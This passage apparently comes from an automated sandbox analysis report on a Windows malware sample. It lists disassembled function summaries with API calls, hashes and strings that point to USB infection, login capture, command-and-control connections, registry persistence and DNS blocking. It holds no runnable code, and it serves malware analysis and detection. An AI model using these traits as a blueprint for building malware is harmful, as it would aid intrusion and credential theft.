                                                                  • strstr.MSVCRT ref: 003702EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 00370322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00370386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003703E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003703EE
                                                                  • LeaveCriticalSection.KERNEL32(003AB4E4), ref: 003703FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037041F
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$CriticalLeaveSection_snprintfatoilstrlenstrstr
                                                                  • String ID: %s=
                                                                  • API String ID: 1805118874-2646424381
                                                                  • Opcode ID: fc0c17e4cbced1a9d059582ba3d907fd934f31465bfa82913651592296cd72fb
                                                                  • Instruction ID: df359d3c6ccf50b77b921fd9942466837951e6e208e81b0e8083957c29fa71f7
                                                                  • Opcode Fuzzy Hash: fc0c17e4cbced1a9d059582ba3d907fd934f31465bfa82913651592296cd72fb
                                                                  • Instruction Fuzzy Hash: 9A11E976A40609EBEB368751CC81FBAB378EB84310F148469FA1D67140DB78BD418F90
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CleanupCountCriticalExitInitializeSectionSleepThreadTick
                                                                  • String ID:
                                                                  • API String ID: 544336047-0
                                                                  • Opcode ID: 45cafbe1ea53cd53aec28c77d21da2276e5172413c87d9c6706ecdba95742d04
                                                                  • Instruction ID: 7f0fa1591e1ee0be880222c6a73bc66ebc889f5a3643ae2c22fe3d04a35b960a
                                                                  • Opcode Fuzzy Hash: 45cafbe1ea53cd53aec28c77d21da2276e5172413c87d9c6706ecdba95742d04
                                                                  • Instruction Fuzzy Hash: 81F090B1D4061466D7203BF97D096AE36545F14329B204A37FB15E22F0EB3C89458AAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CleanupCountCriticalExitInitializeSectionSleepThreadTick
                                                                  • String ID:
                                                                  • API String ID: 544336047-0
                                                                  • Opcode ID: deef3c340394b5666e779a3e9e7f720e5270d1d8cce06f407227b413134fdd78
                                                                  • Instruction ID: dddf8594d11a6f97f2b073f21ee2d1a9fe44775c8454e94e1be6d03f8b306aa9
                                                                  • Opcode Fuzzy Hash: deef3c340394b5666e779a3e9e7f720e5270d1d8cce06f407227b413134fdd78
                                                                  • Instruction Fuzzy Hash: 03F0BB72F00A1456C6333BBD7D0E56D32585F12364F158611F719C69F8EB3485C089A2
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 003645D5
                                                                  • CreateFileMappingA.KERNEL32 ref: 003645FD
                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000,?,?,00010000,EDB88320,00000000), ref: 00364636
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateMappingView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 1261873476-1933919280
                                                                  • Opcode ID: 655d39e16036209100fdf60239a7479dfcaab393c8c4ab7aaf9c1f64f500b9d7
                                                                  • Instruction ID: 9cf9399482b06dbd1cc9f88a778be39e2a718cb70cb8b37003d6ba17ee2f108d
                                                                  • Opcode Fuzzy Hash: 655d39e16036209100fdf60239a7479dfcaab393c8c4ab7aaf9c1f64f500b9d7
                                                                  • Instruction Fuzzy Hash: DB61E3726106028FD326CF18C885BB5B7E5FF84304F28817DE6868B385D779A9A4DB80
                                                                  APIs
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A013
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A04F
                                                                  • lstrlenA.KERNEL32(?), ref: 0040E517
                                                                  • _memicmp.MSVCRT ref: 0040E525
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040E54E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040E57A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strtok$FreeHeapSleep_memicmplstrlen
                                                                  • String ID: [Login]: %s
                                                                  • API String ID: 2470415281-2266835287
                                                                  • Opcode ID: dbf4343face418a870bb8425e8e66a13a343c3042656d238115fe0c3f70b93bf
                                                                  • Instruction ID: 783aa63cf0ce7d9ff363f5601bd85304eb0c082eb699b2ee8fe1f1afe810e237
                                                                  • Opcode Fuzzy Hash: dbf4343face418a870bb8425e8e66a13a343c3042656d238115fe0c3f70b93bf
                                                                  • Instruction Fuzzy Hash: EC21DAB1640204BBD720DB96DD81FAB77ACDB84745F10483AF904533C1E7BD9D61C6A9
                                                                  APIs
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A013
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A04F
                                                                  • lstrlenA.KERNEL32(?), ref: 0036E517
                                                                  • _memicmp.MSVCRT ref: 0036E525
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036E54E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036E57A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strtok$FreeHeapSleep_memicmplstrlen
                                                                  • String ID: [Login]: %s
                                                                  • API String ID: 2470415281-2266835287
                                                                  • Opcode ID: 33f3136c634fc41f62c91a9feff0bbc602e049353e4031ba6289e58ea1357173
                                                                  • Instruction ID: cfe6a38307e7c6637bec1a40e321d5810d88761d796b4440ef52b71919815c8e
                                                                  • Opcode Fuzzy Hash: 33f3136c634fc41f62c91a9feff0bbc602e049353e4031ba6289e58ea1357173
                                                                  • Instruction Fuzzy Hash: 132108B6500204ABD732DB58DC86FAB73ACEB45714F15C418FA094B245F7B5ED44CBA1
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileW), ref: 00401C6E
                                                                    • Part of subcall function 00403750: LdrGetProcedureAddress.NTDLL(?,00000000,00000000,?), ref: 0040376B
                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00401CC6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401CD9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$AddressCloseFileModuleProcedureWrite
                                                                  • String ID: CreateFileW$kernel32.dll
                                                                  • API String ID: 2185083974-2113957990
                                                                  • Opcode ID: 8a3a0deed9bbcea85a1b6a89db91e2350229aa1256e8c9d6a1a26e2b90d2296e
                                                                  • Instruction ID: 3516dd70821b321a82e3fccae0f5f19e3dd812fe4f74b4804ac45d1edfcd853e
                                                                  • Opcode Fuzzy Hash: 8a3a0deed9bbcea85a1b6a89db91e2350229aa1256e8c9d6a1a26e2b90d2296e
                                                                  • Instruction Fuzzy Hash: FA012BB16441187FE7049F68DC85FEB735DAB49714F148239FA15A32E0D2B49D0553A8
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileW), ref: 00361C6E
                                                                    • Part of subcall function 00363750: LdrGetProcedureAddress.NTDLL(?,00000000,00000000,?), ref: 0036376B
                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00361CC6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00361CD9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$AddressCloseFileModuleProcedureWrite
                                                                  • String ID: CreateFileW$kernel32.dll
                                                                  • API String ID: 2185083974-2113957990
                                                                  • Opcode ID: 5175f491e86878ffe8f25cd02e848e932733e971e38d4c411600235d3f5db5a9
                                                                  • Instruction ID: 53f175d369ab480de3b7e4148c3814d9c3c7c1a90066783c2173fe9070ab0dd5
                                                                  • Opcode Fuzzy Hash: 5175f491e86878ffe8f25cd02e848e932733e971e38d4c411600235d3f5db5a9
                                                                  • Instruction Fuzzy Hash: 680108B2A402147FD7159E6D9C8AFEF335D9B45324F15C218F919972C0D6705D4483A0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,00406C55,00000000), ref: 00406DA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID: NtQueryInformationProcess$NtSetInformationProcess$Ul@$ntdll.dll
                                                                  • API String ID: 4139908857-2971258217
                                                                  • Opcode ID: 62a2a73916b9af1f8daf532ab0fdb30c97b42ff7dfa5a627ce04c4475a55d3f5
                                                                  • Instruction ID: e665a3cd0ad87b6e4d351724504253e06bb2307510cb7435dea9c92ab51fd615
                                                                  • Opcode Fuzzy Hash: 62a2a73916b9af1f8daf532ab0fdb30c97b42ff7dfa5a627ce04c4475a55d3f5
                                                                  • Instruction Fuzzy Hash: 8E01D4B234131837EA205A49DC45FEB779CCB85769F010167FE08B72C0DAB99D4082E8
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,00366C55,00000000), ref: 00366DA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID: NtQueryInformationProcess$NtSetInformationProcess$Ul6$ntdll.dll
                                                                  • API String ID: 4139908857-2811123161
                                                                  • Opcode ID: 5fd636623081ad5c6746a1ce7be883d8c68ddfb55d15ceed93d87562152ce491
                                                                  • Instruction ID: 919aabcb657efc3160e91a43329e1d5cee3d4597fc80562b609242bd3a539148
                                                                  • Opcode Fuzzy Hash: 5fd636623081ad5c6746a1ce7be883d8c68ddfb55d15ceed93d87562152ce491
                                                                  • Instruction Fuzzy Hash: 500184B274161837EA32595D9C46FEA739CCB86779F018156FE08AB284DAA59D0082E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ProcWindowsprintf
                                                                  • String ID: %c:\$@WA$[USB]: Infected %s
                                                                  • API String ID: 3179433310-3310510632
                                                                  • Opcode ID: fd5a5e364699ce4a0fdc81f4504cbf464797e88720b1db6411780ffb4476f92d
                                                                  • Instruction ID: 02eb9736952d2a2b4b7c1167389122037410bde8fc9acd6e29a5ba8690f26e1d
                                                                  • Opcode Fuzzy Hash: fd5a5e364699ce4a0fdc81f4504cbf464797e88720b1db6411780ffb4476f92d
                                                                  • Instruction Fuzzy Hash: 6111E7B55001085BC720DF64DC41EBB737CEB44308F04857EFE05A2282E639E9558B69
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ProcWindowsprintf
                                                                  • String ID: %c:\$@W7$[USB]: Infected %s
                                                                  • API String ID: 3179433310-2394137797
                                                                  • Opcode ID: f543c488bb0884bdc4adc060a152600484997cbc20d7aedcb432ecc3a0c38227
                                                                  • Instruction ID: ea1b93b6b24bb468e43115b7495a5c73d6d85e8c6f414671986e278512830218
                                                                  • Opcode Fuzzy Hash: f543c488bb0884bdc4adc060a152600484997cbc20d7aedcb432ecc3a0c38227
                                                                  • Instruction Fuzzy Hash: 7411E3B65001085FCB25DF68EC52EBB736CEB44304F04C968FE0997246EA31D951CF61
                                                                  APIs
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D5E4
                                                                    • Part of subcall function 00408F50: ApplyControlToken.SECUR32(?,?), ref: 00408FB5
                                                                    • Part of subcall function 00408F50: InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00408FF9
                                                                    • Part of subcall function 00408F50: DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00409025
                                                                    • Part of subcall function 00408F50: FreeCredentialsHandle.SECUR32(?), ref: 0040902F
                                                                  • Sleep.KERNEL32(0000000F), ref: 0040D659
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ContextSecuritySleep$ApplyControlCredentialsDeleteFreeHandleInitializeToken
                                                                  • String ID: %s:%d$cnc$VA
                                                                  • API String ID: 3241915987-2824176248
                                                                  • Opcode ID: 20c79ff23815496d10ba28f53a97e5ef7eb88f931315f02d53633f4a8f91e0ef
                                                                  • Instruction ID: 3fba86e59980fe9d4d7b2036a9b00bfb261980af2cf933dbcae5c76902665172
                                                                  • Opcode Fuzzy Hash: 20c79ff23815496d10ba28f53a97e5ef7eb88f931315f02d53633f4a8f91e0ef
                                                                  • Instruction Fuzzy Hash: 6C41D6B5E00104EBC710EBD9DC819AEB3B9EB84318F14457AFD09E7391DA35ED0487A9
                                                                  APIs
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036D5E4
                                                                    • Part of subcall function 00368F50: ApplyControlToken.SECUR32(?,?), ref: 00368FB5
                                                                    • Part of subcall function 00368F50: InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00368FF9
                                                                    • Part of subcall function 00368F50: DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00369025
                                                                    • Part of subcall function 00368F50: FreeCredentialsHandle.SECUR32(?), ref: 0036902F
                                                                  • Sleep.KERNEL32(0000000F), ref: 0036D659
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ContextSecuritySleep$ApplyControlCredentialsDeleteFreeHandleInitializeToken
                                                                  • String ID: %s:%d$cnc$V7
                                                                  • API String ID: 3241915987-288577137
                                                                  • Opcode ID: a166691f6ed2eb12e9b610c35a9c4949241980e87640e2064536707b2c0be8fe
                                                                  • Instruction ID: 672eb53ee4bf5a25192f836364db1fe4fc185d56af003a34fe7ae0075d99e68c
                                                                  • Opcode Fuzzy Hash: a166691f6ed2eb12e9b610c35a9c4949241980e87640e2064536707b2c0be8fe
                                                                  • Instruction Fuzzy Hash: F241E3B6E00104ABC726DB99EC819AEB3BDEB85314F158165F909DB30ADB71ED4087A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strstr$lstrcmp
                                                                  • String ID: bdns$block
                                                                  • API String ID: 142677638-4143068083
                                                                  • Opcode ID: 16de161929d562d1a81be2ce0f5dc1ee04b4dd39fc5185927e1aa3bde43099bf
                                                                  • Instruction ID: 124088c1a3f70e1cbae084184767cd66ed6bf528bf03336b987e05220ac7cc48
                                                                  • Opcode Fuzzy Hash: 16de161929d562d1a81be2ce0f5dc1ee04b4dd39fc5185927e1aa3bde43099bf
                                                                  • Instruction Fuzzy Hash: 9121B0766012086BDB10DF49AC85EFB736CDB88711F14812BFD05E3291E778ED5186BA
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strstr$lstrcmp
                                                                  • String ID: bdns$block
                                                                  • API String ID: 142677638-4143068083
                                                                  • Opcode ID: 49719317cb468a0ae38202d6bfdad452ab49506c180a23054aaaa2580947ecda
                                                                  • Instruction ID: 555bcffc5ca8faf6e183e2b3b2150bae9b22eb1b3f3732b71f3e01d6e7c93e47
                                                                  • Opcode Fuzzy Hash: 49719317cb468a0ae38202d6bfdad452ab49506c180a23054aaaa2580947ecda
                                                                  • Instruction Fuzzy Hash: 3821C4766012086B9B22DE59EC86DBB736CDB88711F08C119FC09D7201E774ED1487F1
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103A), ref: 00407E2C
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00407E63
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00407E7A
                                                                  • connect.WS2_32(?,00000008,00000010), ref: 00407E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocalconnectioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3721573447-0
                                                                  • Opcode ID: 6a0cf34466a604d09193a111f7b2e156c19cd74b9b825a2281b43bf372efd1ff
                                                                  • Instruction ID: 8573ccf17625dbd4e70cb95bd4ecb179e2b8f2d801530163547a45014eaf0546
                                                                  • Opcode Fuzzy Hash: 6a0cf34466a604d09193a111f7b2e156c19cd74b9b825a2281b43bf372efd1ff
                                                                  • Instruction Fuzzy Hash: E811D631A00304ABC720DF59D805AD6B7A8DB49724F00469AFA59DB3D1D2B169908794
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103A), ref: 00367E2C
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00367E63
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00367E7A
                                                                  • connect.WS2_32(?,00000008,00000010), ref: 00367E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocalconnectioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3721573447-0
                                                                  • Opcode ID: 10c2d2c5d31b4b5f38ae8fd0baf6be88ba34f547113950efd8f6941bd99097e7
                                                                  • Instruction ID: e83f810f3307b80f796c94b4d89c6e623e78c13480129eae9bf5b50f242efe01
                                                                  • Opcode Fuzzy Hash: 10c2d2c5d31b4b5f38ae8fd0baf6be88ba34f547113950efd8f6941bd99097e7
                                                                  • Instruction Fuzzy Hash: 5911E631A00704AFC730DF68D849ED6B7A8EF49724F00869AFA5DDB391D2B1A8548790
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 0040E77C
                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000012,?), ref: 0040E793
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0040E7B5
                                                                  • RegNotifyChangeKeyValue.ADVAPI32 ref: 0040E7C3
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040E7D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ChangeCloseNotifyOpenlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2592630252-0
                                                                  • Opcode ID: af4cde93d3db90eb8642d8f6f32dd5aa766a189061079ea768f5a47468b3961d
                                                                  • Instruction ID: 817f0236f2bd820b7f614add4cf1e09f77a3d0cd335360597150fdbb8a11f275
                                                                  • Opcode Fuzzy Hash: af4cde93d3db90eb8642d8f6f32dd5aa766a189061079ea768f5a47468b3961d
                                                                  • Instruction Fuzzy Hash: BF011A75740304BFE720CF65DC89F977BACEB88B50F10C429BB499B690D674E8408B68
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 0036E77C
                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000012,?), ref: 0036E793
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0036E7B5
                                                                  • RegNotifyChangeKeyValue.ADVAPI32 ref: 0036E7C3
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0036E7D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ChangeCloseNotifyOpenlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2592630252-0
                                                                  • Opcode ID: 71613d8df9322482468eb674335943dd637ea3684389d1b6b429199d298963fe
                                                                  • Instruction ID: 2c85a111577bb5bad62c448310fb158792a7921f66f3c1140621e4e5120b58e8
                                                                  • Opcode Fuzzy Hash: 71613d8df9322482468eb674335943dd637ea3684389d1b6b429199d298963fe
                                                                  • Instruction Fuzzy Hash: 5A01DE76350344BFE730CB69DC85F9777ACEB88B50F108419BA499B680D675E8809B64
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040771E
                                                                  • _snprintf.MSVCRT ref: 00407738
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                    • Part of subcall function 00404900: WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
                                                                    • Part of subcall function 00404900: ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
                                                                  • lstrcmpA.KERNEL32(00000000,00411A30), ref: 0040777F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MutexObjectReleaseSingleWait_snprintflstrcmplstrlenmemset
                                                                  • String ID: state_%s
                                                                  • API String ID: 1716770999-3670522127
                                                                  • Opcode ID: 235272e43844a436d13b728baab66befe5b0e802e7c81055b935bd28c73822a3
                                                                  • Instruction ID: 2cd1af118f2aaba9ee0144bd5bb7b35bf02337a9ecf34d3b98cb7566c03369e6
                                                                  • Opcode Fuzzy Hash: 235272e43844a436d13b728baab66befe5b0e802e7c81055b935bd28c73822a3
                                                                  • Instruction Fuzzy Hash: 0C01DBF5A903087BDB10F7A4DE0BFF9736C9B44704F0045E9B719A2082F5B46A448799
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036771E
                                                                  • _snprintf.MSVCRT ref: 00367738
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                    • Part of subcall function 00364900: WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
                                                                    • Part of subcall function 00364900: ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
                                                                  • lstrcmpA.KERNEL32(00000000,00371A30), ref: 0036777F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MutexObjectReleaseSingleWait_snprintflstrcmplstrlenmemset
                                                                  • String ID: state_%s
                                                                  • API String ID: 1716770999-3670522127
                                                                  • Opcode ID: 52643eb95f64d567a635d13d37d1b6d9466f33161a3cec5df7e5f86bb5de1245
                                                                  • Instruction ID: db7228121507ce2399d7bd12aa91f4cbac28bedde2d871d9c20ec24077593767
                                                                  • Opcode Fuzzy Hash: 52643eb95f64d567a635d13d37d1b6d9466f33161a3cec5df7e5f86bb5de1245
                                                                  • Instruction Fuzzy Hash: 5101FEB69503087ADB25F6A4DD0BFF973AC8B44704F40C5D4FA1DE6081F5B45A544B90
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 0040510F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00405122
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040512B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-comm
                                                                  • API String ID: 3057366584-1028030816
                                                                  • Opcode ID: a93b1516683958c1d9d60c9ee514b9fb12ccde5092aeeca8bbe9916ea1720a1c
                                                                  • Instruction ID: 467e8c21684c0235fe829960707385420c5f419fa334f9ea544b7238d55dbfde
                                                                  • Opcode Fuzzy Hash: a93b1516683958c1d9d60c9ee514b9fb12ccde5092aeeca8bbe9916ea1720a1c
                                                                  • Instruction Fuzzy Hash: 44210875A802047BE714DF91CC46FEB3328B784706F1409AAF504A72D2E6B89E44DBA8
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 0036510F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00365122
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0036512B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-comm
                                                                  • API String ID: 3057366584-1028030816
                                                                  • Opcode ID: 960aadf89982522ef0b9c9624a0620d23d9c0cb866200c7825bdfd5789247b34
                                                                  • Instruction ID: 888e425b904f19f39087ee86c3fd34e49c3e679b83eb9e9027e10f52aa2ab210
                                                                  • Opcode Fuzzy Hash: 960aadf89982522ef0b9c9624a0620d23d9c0cb866200c7825bdfd5789247b34
                                                                  • Instruction Fuzzy Hash: 06213672A80208BBD716DB54DC42FEB332CEB81711F158A56F504BB2C2EA70DA44CBA0
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 0040508F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 004050A2
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-pid
                                                                  • API String ID: 3057366584-2694366501
